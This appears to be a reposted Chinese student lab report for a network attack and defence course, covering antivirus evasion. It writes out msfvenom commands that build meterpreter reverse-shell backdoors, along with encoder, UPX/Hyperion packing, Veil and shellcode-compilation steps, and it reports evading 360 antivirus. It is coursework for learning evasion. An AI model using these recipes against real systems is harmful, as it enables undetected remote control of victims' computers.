2018-2019-2 《网络对抗技术》Exp3免杀原理与实践 20165222
1. 实践内容 ?1.1 正确使用msf编码器 使用 msfvenom?-p?windows/meterpreter/reverse_tcp?-e?x86/shikata_ga_nai?-i?7?-b?‘x00’?LHOST=192.168.136.135?LPORT=5222?-f?exe?>?cess.exe? 生成后门程序,其中-p设置平台及连接方式,-e设置编码方式,(可通过msfvenom -l encoders列出可用编码器)
-i设置编码次数。-b设置直到不出现后门设定的字符。
? 检测一下
? 可见直接通过修改编码器的方式行不通。 msfvenom生成如jar之类的其他文件 使用?msfvenom?-p?java/meterpreter/reverse_tcp?LHOST=192.168.136.135?LPORT=5222?x.jar>?cess_java.jar来生成jar文件。 其中-p的值可由msfvenom - l payloads查看。 检查发现
同样无法通过。 veil-evasion 输入veil进入,然后根据提示生成自己想要的后门即可。 我选择了用ruby写的在meterpreter平台下的tcp反弹连接;
然后设置ip及端口
最后输出文件即可。 但同样被杀软轻而易举识别出来。 ? 关掉杀软测试能否反弹连接,发现成功。
加壳工具 1.执行upx 20165222_backdoor.exe -o 2016.exe
?发现也被杀了出来。
? ?2.加密壳 进入/usr/share/windows-binaries/hyperion/中,执行wine hyperion.exe -v 2016.exe sxx_upxed_Hyperion.exe
? 但同样也被杀出来。
使用shellcode编程 使用?msfvenom?-p?windows/meterpreter/reverse_tcp?LHOST=192.168.136.135?LPORT=5222?-f?c? 生成shellcod
然后将其写入5222.c文件,包含如下主函数:
再用i686-w64-mingw32-g++ 5222.c -o 5222.exe将其编译为exe文件
放入win10下仍能被检测出。
1.2 通过组合应用各种技术实现恶意代码免杀 ?使用mesvenom,再改编码器,放入VC中执行生成可执行文件,成功连接。
?360版本
?
成功:
?
1.3用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
?
?2.1.基础问题回答 ? (1)杀软是如何检测出恶意代码的? 基于特征码和软件的行为。 ? (2)免杀是做什么? 对木马等进行处理,让其不被杀软发现。 ? (3)免杀的基本方法有哪些? 改变特征码:1,加壳;2,换编码器;3,换不同平台重写代码。 改变行为:减少对系统的修改。 ? 2.2.实践总结与体会 此次实验尽管有些麻烦,但最终还是成功了,感觉相当舒服。 ? 2.3.开启杀软能绝对防止电脑中恶意代码吗? 不能,比如自己手工加壳的后门程序病毒库里没有就很难检查出来。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- wpf – 如何在关闭处理程序中区分“窗口关闭按钮
- windows-server-2008 – 查找保存端口8443的服务
- 如何在Windows XP上以只读方式安装硬盘?
- 如何在Windows中运行Apache基准测试?
- windows – 同时重命名和域加入机器的风险是什么
- windows – winddk:__ iob_func重新定义
- XP上的Emacs,tramp,plink问题
- windows-server-2008 – 如何增加分配给IIS .NET
- windows-server-2003 – Windows事件日志 – 服务
- windows-phone-8 – Windows Phone 8网络信息